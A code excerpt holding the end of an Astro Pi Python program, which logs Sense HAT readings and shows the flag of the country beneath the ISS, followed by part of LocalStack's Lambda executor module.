Y,Y,Y,W,G,BL,Y,Y,Y,Y,W,G,G,W,W,W,W,W,G,G,G],"HN":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,W,W,B,W,W,B,W,W,W,B,W,W,W,W,B,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B],"IE":[G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O],"IL":[W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,W,W,W,W,B,W,W,W,W,W,W,B,W,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W],"IS":[B,W,R,R,W,B,B,B,B,W,R,R,W,B,B,B,W,W,R,R,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,R,R,W,W,W,W,B,W,R,R,W,B,B,B,B,W,R,R,W,B,B,B],"KE":[BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,R,R,BL,BL,BL,W,W,W,R,R,W,W,W,R,R,BL,W,R,BL,R,R,R,R,BL,R,W,BL,R,R,W,W,W,R,R,W,W,W,G,G,G,R,R,G,G,G,G,G,G,G,G,G,G,G],"KH":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,R,R,R,R,R,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,W,W,W,W,R,R,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B],"LA":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,B,B,B,W,W,B,B,B,B,B,W,W,W,W,B,B,B,B,W,W,W,W,B,B,B,B,B,W,W,B,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R],"LR":[B,B,B,R,R,R,R,R,B,W,B,R,R,R,R,R,B,B,B,W,W,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R],"LT":[DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR],"MA":[DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,G,G,DR,DR,DR,DR,DR,G,G,G,G,DR,DR,DR,DR,DR,G,G,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR],"NZ":[W,R,W,B,B,B,B,B,R,R,R,B,B,B,B,B,W,R,W,B,B,R,B,B,B,B,B,B,B,B,B,B,B,B,B,B,R,B,R,B,B,B,B,B,B,B,B,B,B,B,B,B,B,R,B,B,B,B,B,B,B,B,B,B],"LV":[BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,]}
# Create a datetime variable to store the end time of the experiment
stop_delta = datetime.timedelta(minutes=running_time)
# Creates a datetime variable to store the start time of the experiment
start_time = datetime.datetime.now()
# Sets the aproximatly distance from earth surface to ISS
self.distance_ISS_earth = 400000
# Sets earth mass
self.earth_mass = 5.9722 * (10 ** 24)
# Sets the gravital constant for earth
self.gravitational_constant = 6.67 * (10 ** -11)
# Sets ISS mass
self.ISS_mass = 419700
# Earth radius
self.earth_radius = 6371 * (10 ** 3)
# Sets the running_time (in min) for the experiment
self.running_time = running_time
# Calculates the stop_time for the experiment
self.stop_time = start_time + stop_delta
def calculate_force(self):
"""Calculating force and speed for the ISS
@return: dict
"""
# Calculating force
force = (self.gravitational_constant * self.ISS_mass * self.earth_mass) / ((self.distance_ISS_earth + self.earth_radius) ** 2)
# Calculating speed
speed = math.sqrt((self.gravitational_constant * self.earth_mass) / (self.distance_ISS_earth + self.earth_radius))
# Formats the speed and force
measurements_dict = {'force': force, 'speed': speed}
return measurements_dict
def check_time(self):
"""Checks if the time for the experiment is up
@return: Boolean
"""
# Create a datetime variable to store the current time
now_time = datetime.datetime.now()
# Checks if the experiment time has ran up
if (now_time < self.stop_time):
return True
return False
def check_sleep(self, timedelta_seconds):
"""Checks if can sleep or if the current_time + sleep_time exceeds project time
@param1: int
@return: Boolean
"""
# Gets current time
now = datetime.datetime.now()
# Calculates time after sleep
after_timedelta = datetime.timedelta(seconds=timedelta_seconds)
# Checks if it is possible to sleep
if (now + after_timedelta < self.stop_time):
return True
return False
def get_coordinates_ISS(self):
"""Get's current ISS coordinates
@return: dict
"""
# Sets the constant variables for finding the ISS location
name = "ISS (ZARYA)"
satellite1 = "1 25544U 98067A 20013.25395446 .00001038 00000-0 26560-4 0 9999"
satellite2 = "2 25544 51.6448 40.0308 0005021 125.1468 332.5313 15.49559205207846"
# Gets ISS location
iss = ephem.readtle(name, satellite1, satellite2)
iss.compute()
# Formats the coordinates
lat = int(str(iss.sublat).split(":")[0]) + int(str(iss.sublat).split(":")[1])*0.01
long = int(str(iss.sublong).split(":")[0]) + int(str(iss.sublong).split(":")[1])*0.01
coordinates_dict = {'lat': lat, 'long': long}
return coordinates_dict
def write_data_continuously(self, files):
"""Writes humidity, temperature and pressure for the current time (every 60s)
@return: None
"""
#If you have time left for the experiment and the file was created correctly
while (self.check_time()):
# Writes data to file
self.write_data_csv(files[0])
self.write_force_csv(files[1])
# Sleeps if possible
if (self.check_sleep(60)):
sleep(60)
else:
return None
def write_data_csv(self, file):
"""Writes current data to the csv file"""
# Connect to the Sense HAT
sh = SenseHat()
# Get current time formatted
now = datetime.datetime.utcnow()
dt_string = now.strftime("%d/%m/%Y, %H:%M:%S")
# Read data from Sense HAT
temperature = sh.get_temperature()
humidity = sh.get_humidity()
pressure = sh.get_pressure()
# Format the data from the Sense HAT
temperature = "{0:.2f}".format(temperature)
humidity = "{0:.2f}".format(humidity)
pressure = "{0:.2f}".format(pressure)
# Save the data to the file
file.info("%s, %s, %s, %s", dt_string, humidity, temperature, pressure)
def setup_logger(self, dir_path, name):
"""Tries to create csv logger object"""
try:
#Try to create a file at the dir_path
handler = logging.FileHandler(dir_path)
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
self.created_file = True
return logger
except:
self.created_file = False
def write_force_csv(self, file):
"""Writes the force and speed data to the designated csv file"""
#Gets measurements
measurements = self.calculate_force()
force = measurements['force']
speed = measurements['speed']
force = "{0:.2f}".format(force)
speed = "{0:.2f}".format(speed)
# Get current time formatted
now = datetime.datetime.utcnow()
dt_string = now.strftime("%d/%m/%Y, %H:%M:%S")
# Save the data to the file
file.info("%s, %s, %s", dt_string, speed, force)
def show_country_countinously(self):
"""Updates the country flags on the SenseHat LED Matrix (every 5s)"""
self.geo = rg.RGeocoder(mode=2, verbose=True, stream=io.StringIO(open(os.path.dirname(os.path.realpath(__file__)) + '/custom.csv', encoding='utf-8').read()))
#If you have time left for the experiment and the file was created correctly
while (self.check_time()):
self.show_country()
# Sleeps if possible
if (self.check_sleep(5)):
sleep(5)
else:
return None
def show_country(self):
"""Gets the country that is below ISS
@return: dict
"""
# Gets ISS coordinates
coordinates_dict = self.get_coordinates_ISS()
coordinates = (coordinates_dict['lat'], coordinates_dict['long']),
# Find the country below ISS
result = self.geo.query(coordinates)[0]['cc']
sense = SenseHat()
#Displays the ocean name
if result == 'InO':
sense.show_message('Indian Ocean', text_colour = [255, 255, 255], back_colour = [0, 0, 255])
return
elif result == 'AtO':
sense.show_message('Atlantic Ocean', text_colour = [255, 255, 255], back_colour = [0, 0, 255])
return
elif result == 'PaO':
sense.show_message('Pacific Ocean', text_colour = [255, 255, 255], back_colour = [0, 0, 255])
return
#Displays the country flag
for flag in self.flags:
if result == flag:
sense.set_pixels(self.flags[flag])
return
# Creates the class object for Astro_Pi()
runtime = 1
ASTRO_PI_OBJ = Astro_Pi(runtime)
ASTRO_PI_OBJ1 = Astro_Pi(runtime)
# Sets the dir_path for the csv file
dir_path01 = os.path.dirname(os.path.realpath(__file__)) + "/data01.csv"
file01 = ASTRO_PI_OBJ.setup_logger(dir_path01, 'data01.csv')
file01.info("%s, %s, %s, %s, %s", 'Date(UTC)', 'Time(UTC)', 'Humidity', 'Temperature(C)', 'Pressure(hPa)')
dir_path02 = os.path.dirname(os.path.realpath(__file__)) + "/data02.csv"
file02 = ASTRO_PI_OBJ.setup_logger(dir_path02, 'data02.csv')
file02.info("%s, %s, %s, %s", 'Date(UTC)', 'Time(UTC)', 'Speed(m/s)', 'Force(N)')
# Starts a thread to write in the csv file
x = threading.Thread(target=ASTRO_PI_OBJ.write_data_continuously, args = ([file01, file02], ))
y = threading.Thread(target=ASTRO_PI_OBJ1.show_country_countinously)
x.start()
y.start()
# Waits for the threads to finish and closes them
x.join()
y.join()
|
lambda_executors.py
|
import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
import uuid
from multiprocessing import Process, Queue
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.constants import DEFAULT_LAMBDA_CONTAINER_REGISTRY
from localstack.services.awslambda.lambda_utils import (
API_PATH_ROOT,
LAMBDA_RUNTIME_PROVIDED,
get_main_endpoint_from_container,
get_record_from_event,
is_java_lambda,
is_nodejs_runtime,
rm_docker_container,
store_lambda_logs,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
is_port_open,
json_safe,
last_index_of,
long_uid,
md5,
now,
retry,
run,
run_safe,
safe_requests,
save_file,
short_uid,
timestamp,
to_bytes,
to_str,
truncate,
wait_for_port_open,
)
from localstack.utils.docker_utils import (
DOCKER_CLIENT,
ContainerException,
DockerContainerStatus,
PortMappings,
)
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.dirs.tmp
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
# port number used in lambci images for stay-open invocation mode
STAY_OPEN_API_PORT = 9001
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
# Lambda event type
LambdaEvent = Union[Dict[str, Any], str, bytes]
class InvocationException(Exception):
def __init__(self, message, log_output=None, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
class LambdaContext(object):
DEFAULT_MEMORY_LIMIT = 1536
def __init__(
self, lambda_function: LambdaFunction, qualifier: str = None, context: Dict[str, Any] = None
):
context = context or {}
self.function_name = lambda_function.name()
self.function_version = lambda_function.get_qualifier_version(qualifier)
self.client_context = context.get("client_context")
self.invoked_function_arn = lambda_function.arn()
if qualifier:
self.invoked_function_arn += ":" + qualifier
self.cognito_identity = context.get("identity")
self.aws_request_id = str(uuid.uuid4())
self.memory_limit_in_mb = lambda_function.memory_size or self.DEFAULT_MEMORY_LIMIT
self.log_group_name = "/aws/lambda/%s" % self.function_name
self.log_stream_name = "%s/[1]%s" % (timestamp(format="%Y/%m/%d"), short_uid())
def get_remaining_time_in_millis(self):
# TODO implement!
return 1000 * 60
class AdditionalInvocationOptions:
# Maps file keys to file paths. The keys can be used as placeholders in the env. variables
# and command args to reference files - e.g., given `files_to_add` as {"f1": "/local/path"} and
# `env_updates` as {"MYENV": "{f1}"}, the Lambda handler will receive an environment variable
# `MYENV=/lambda/path` and the file /lambda/path will be accessible to the Lambda handler
# (either locally, or inside Docker).
files_to_add: Dict[str, str]
# Environment variable updates to apply for the invocation
env_updates: Dict[str, str]
# Updated command to use for starting the Lambda process (or None)
updated_command: Optional[str]
# Updated handler as entry point of Lambda function (or None)
updated_handler: Optional[str]
def __init__(
self,
files_to_add=None,
env_updates=None,
updated_command=None,
updated_handler=None,
):
self.files_to_add = files_to_add or {}
self.env_updates = env_updates or {}
self.updated_command = updated_command
self.updated_handler = updated_handler
class InvocationResult:
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class InvocationContext:
lambda_function: LambdaFunction
function_version: str
handler: str
event: LambdaEvent
lambda_command: Union[str, List[str]] # TODO: change to List[str] ?
docker_flags: Union[str, List[str]] # TODO: change to List[str] ?
environment: Dict[str, Optional[str]]
context: LambdaContext
invocation_type: str # "Event" or "RequestResponse"
def __init__(
self,
lambda_function: LambdaFunction,
event: LambdaEvent,
environment=None,
context=None,
lambda_command=None,
docker_flags=None,
function_version=None,
invocation_type=None,
):
self.lambda_function = lambda_function
self.handler = lambda_function.handler
self.event = event
self.environment = {} if environment is None else environment
self.context = {} if context is None else context
self.lambda_command = lambda_command
self.docker_flags = docker_flags
self.function_version = function_version
self.invocation_type = invocation_type
class LambdaExecutorPlugin:
"""Plugin abstraction that allows to hook in additional functionality into the Lambda executors."""
INSTANCES: List["LambdaExecutorPlugin"] = []
def initialize(self):
"""Called once, for any active plugin to run initialization logic (e.g., downloading dependencies).
Uses lazy initialization - i.e., runs only after the first should_apply() call returns True"""
pass
def should_apply(self, context: InvocationContext) -> bool:
"""Whether the plugin logic should get applied for the given Lambda invocation context."""
return False
def prepare_invocation(
self, context: InvocationContext
) -> Optional[Union[AdditionalInvocationOptions, InvocationResult]]:
"""Return additional invocation options for given Lambda invocation context. Optionally, an
InvocationResult can be returned, in which case the result is returned to the client right away."""
return None
def process_result(
self, context: InvocationContext, result: InvocationResult
) -> InvocationResult:
"""Optionally modify the result returned from the given Lambda invocation."""
return result
def init_function_configuration(self, lambda_function: LambdaFunction):
"""Initialize the configuration of the given function upon creation or function update."""
pass
def init_function_code(self, lambda_function: LambdaFunction):
"""Initialize the code of the given function upon creation or function update."""
pass
@classmethod
def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
if not cls.INSTANCES:
classes = get_all_subclasses(LambdaExecutorPlugin)
cls.INSTANCES = [clazz() for clazz in classes]
return cls.INSTANCES
class LambdaInvocationForwarderPlugin(LambdaExecutorPlugin):
"""Plugin that forwards Lambda invocations to external targets defined in LAMBDA_FORWARD_URL"""
def should_apply(self, context: InvocationContext) -> bool:
"""If LAMBDA_FORWARD_URL is configured, forward the invocation of this Lambda to the target URL."""
func_forward_url = self._forward_url(context)
return bool(func_forward_url)
def prepare_invocation(
self, context: InvocationContext
) -> Optional[Union[AdditionalInvocationOptions, InvocationResult]]:
forward_url = self._forward_url(context)
result = self._forward_to_url(
forward_url,
context.lambda_function,
context.event,
context.context,
context.invocation_type,
)
return result
def _forward_to_url(
self,
forward_url: str,
lambda_function: LambdaFunction,
event: Union[Dict, bytes],
context: LambdaContext,
invocation_type: str,
) -> InvocationResult:
func_name = lambda_function.name()
url = "%s%s/functions/%s/invocations" % (forward_url, API_PATH_ROOT, func_name)
copied_env_vars = lambda_function.envvars.copy()
copied_env_vars["LOCALSTACK_HOSTNAME"] = config.HOSTNAME_EXTERNAL
copied_env_vars["LOCALSTACK_EDGE_PORT"] = str(config.EDGE_PORT)
headers = aws_stack.mock_aws_request_headers("lambda")
headers["X-Amz-Region"] = lambda_function.region()
headers["X-Amz-Request-Id"] = context.aws_request_id
headers["X-Amz-Handler"] = lambda_function.handler
headers["X-Amz-Function-ARN"] = context.invoked_function_arn
headers["X-Amz-Function-Name"] = context.function_name
headers["X-Amz-Function-Version"] = context.function_version
headers["X-Amz-Role"] = lambda_function.role
headers["X-Amz-Runtime"] = lambda_function.runtime
headers["X-Amz-Timeout"] = str(lambda_function.timeout)
headers["X-Amz-Memory-Size"] = str(context.memory_limit_in_mb)
headers["X-Amz-Log-Group-Name"] = context.log_group_name
headers["X-Amz-Log-Stream-Name"] = context.log_stream_name
headers["X-Amz-Env-Vars"] = json.dumps(copied_env_vars)
headers["X-Amz-Last-Modified"] = str(int(lambda_function.last_modified.timestamp() * 1000))
headers["X-Amz-Invocation-Type"] = invocation_type
headers["X-Amz-Log-Type"] = "Tail"
if context.client_context:
headers["X-Amz-Client-Context"] = context.client_context
if context.cognito_identity:
headers["X-Amz-Cognito-Identity"] = context.cognito_identity
data = run_safe(lambda: to_str(event)) or event
data = json.dumps(json_safe(data)) if isinstance(data, dict) else str(data)
LOG.debug(
"Forwarding Lambda invocation to LAMBDA_FORWARD_URL: %s", config.LAMBDA_FORWARD_URL
)
result = safe_requests.post(url, data, headers=headers)
if result.status_code >= 400:
raise Exception(
"Received error status code %s from external Lambda invocation" % result.status_code
)
content = run_safe(lambda: to_str(result.content)) or result.content
LOG.debug(
"Received result from external Lambda endpoint (status %s): %s",
result.status_code,
content,
)
result = InvocationResult(content)
return result
def _forward_url(self, context: InvocationContext) -> str:
env_vars = context.lambda_function.envvars
return env_vars.get("LOCALSTACK_LAMBDA_FORWARD_URL") or config.LAMBDA_FORWARD_URL
def handle_error(
lambda_function: LambdaFunction, event: Dict, error: Exception, asynchronous: bool = False
):
if asynchronous:
if get_record_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_record_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
return sqs_error_to_dead_letter_queue(sqs_queue_arn, event, error)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(lambda_function, event, error)
class LambdaAsyncLocks:
locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
creation_lock: threading.Lock
def __init__(self):
self.locks = {}
self.creation_lock = threading.Lock()
def assure_lock_present(
self, key: str, lock: Union[threading.Semaphore, threading.Lock]
) -> Union[threading.Semaphore, threading.Lock]:
with self.creation_lock:
return self.locks.setdefault(key, lock)
LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, lambda_function: LambdaFunction):
# setup environment pre-defined variables for docker environment
result = lambda_function.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, lambda_function.region())
return result
def execute(
self,
func_arn: str, # TODO remove and get from lambda_function
lambda_function: LambdaFunction,
event: Dict,
context: LambdaContext = None,
version: str = None,
asynchronous: bool = False,
callback: Callable = None,
lock_discriminator: str = None,
):
# note: leave here to avoid circular import issues
from localstack.utils.aws.message_forwarding import lambda_result_to_destination
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
with contextlib.ExitStack() as stack:
if lock_discriminator:
stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
invocation_type = "Event" if asynchronous else "RequestResponse"
inv_context = InvocationContext(
lambda_function,
event=event,
function_version=version,
context=context,
invocation_type=invocation_type,
)
try:
result = self._execute(lambda_function, inv_context)
except Exception as e:
raised_error = e
dlq_sent = handle_error(lambda_function, event, e, asynchronous)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
lambda_function, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
"""Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
pass
def cleanup(self, arn=None):
"""Called once during startup - can be used, e.g., to clean up left-over Docker containers"""
pass
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
"""Make the given file available to the Lambda process (e.g., by copying into the container) for the
given invocation context; Returns the path to the file that will be available to the Lambda handler."""
raise NotImplementedError
def apply_plugin_patches(self, inv_context: InvocationContext) -> Optional[InvocationResult]:
"""Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
invocation_results = []
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
# initialize, if not done yet
if not hasattr(plugin, "_initialized"):
LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
plugin.initialize()
plugin._initialized = True
# invoke plugin to prepare invocation
inv_options = plugin.prepare_invocation(inv_context)
if not inv_options:
continue
if isinstance(inv_options, InvocationResult):
invocation_results.append(inv_options)
continue
# copy files
file_keys_map = {}
for key, file_path in inv_options.files_to_add.items():
file_in_container = self.provide_file_to_lambda(file_path, inv_context)
file_keys_map[key] = file_in_container
# replace placeholders like "{<fileKey>}" with corresponding file path
for key, file_path in file_keys_map.items():
for env_key, env_value in inv_options.env_updates.items():
inv_options.env_updates[env_key] = str(env_value).replace(
"{%s}" % key, file_path
)
if inv_options.updated_command:
inv_options.updated_command = inv_options.updated_command.replace(
"{%s}" % key, file_path
)
inv_context.lambda_command = inv_options.updated_command
# update environment
inv_context.environment.update(inv_options.env_updates)
# update handler
if inv_options.updated_handler:
inv_context.handler = inv_options.updated_handler
if invocation_results:
# TODO: This is currently indeterministic! If multiple execution plugins attempt to return
# an invocation result right away, only the first one is returned. We need a more solid
# mechanism for conflict resolution if multiple plugins interfere!
if len(invocation_results) > 1:
LOG.warning(
"Multiple invocation results returned from "
"LambdaExecutorPlugin.prepare_invocation calls - choosing the first one: %s",
invocation_results,
)
return invocation_results[0]
def process_result_via_plugins(
self, inv_context: InvocationContext, invocation_result: InvocationResult
) -> InvocationResult:
"""Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
invocation_result = plugin.process_result(inv_context, invocation_result)
return invocation_result
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
env_vars = inv_context.environment
runtime = lambda_function.runtime or ""
event = inv_context.event
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and lambda_function
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin",
len(event_body),
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
# apply plugin patches
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
if config.LAMBDA_DOCKER_FLAGS:
inv_context.docker_flags = (
f"{config.LAMBDA_DOCKER_FLAGS} {inv_context.docker_flags or ''}".strip()
)
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
lambda_function,
inv_context,
stdin=event_stdin_bytes,
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
except InvocationException as e:
result = e.result or ""
log_output = e.log_output or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
func_arn = lambda_function and lambda_function.arn()
log_lambda_result(func_arn, result, log_output)
# store log output - TODO get live logs from `process` above?
store_lambda_logs(lambda_function, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
# create result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
runtime = lambda_function.runtime
handler = lambda_function.handler
environment = inv_context.environment = self._prepare_environment(lambda_function)
event = inv_context.event
context = inv_context.context
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info(
'Empty event body specified for invocation of Lambda "%s"', lambda_function.arn()
)
event = {}
event_body = json.dumps(json_safe(event))
event_bytes_for_stdin = self.prepare_event(environment, event_body)
inv_context.event = event_bytes_for_stdin
Util.inject_endpoints_into_env(environment)
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s",
config.LAMBDA_JAVA_OPTS,
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s", lambda_function.arn())
result = self.run_lambda_executor(lambda_function=lambda_function, inv_context=inv_context)
return result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
if config.LAMBDA_REMOTE_DOCKER:
LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
return local_file
